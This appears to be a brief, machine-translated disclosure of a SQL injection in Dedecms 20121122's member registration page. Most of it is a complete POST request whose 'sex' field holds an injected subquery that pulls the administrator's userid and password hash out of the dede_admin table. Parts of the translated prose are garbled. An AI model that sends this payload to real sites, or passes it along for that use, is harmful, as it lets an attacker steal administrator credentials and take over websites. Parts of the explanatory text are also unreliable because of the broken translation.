Dedecms version 20121122
Magic_quotes_gpc = Off
There should be no major hazards.
A Dedecms injection vulnerability has been detected and does not seem to have been fixed. You can obtain the administrator password by reusing the vulnerability.
It is a vulnerability. In fact, it is not only a review mechanism bypass, but also an administrator password.
The following data is submitted by POST instead of POST.
Http: // www.2ctocom/member/reg_new.php
POST
Dopost = regbase & step = 1 & mtype = % E4 % B8 % AA % E4 % BA & mtype = % E4 % B8 % AA % E4 % BA & userid = c4rp3nt3r & uname = c4rp3nt3r & userpwd = ssssss & userpwdok = ssssss & email = sss % 40ss. ss & safequestion = 0 & safeanswer = & sex = boy ', 100,100, 'sss @ xx. xx', 1000,0, 'www 'and @ ''', (select concat (userid, 0x3a, pwd) from 'dede _ admin' limit 1), 0 ,'', 1316751900, '', 1316751900,''); % 00 & vdcode = glos & agree =
After successful registration, the Avatar contains interesting information.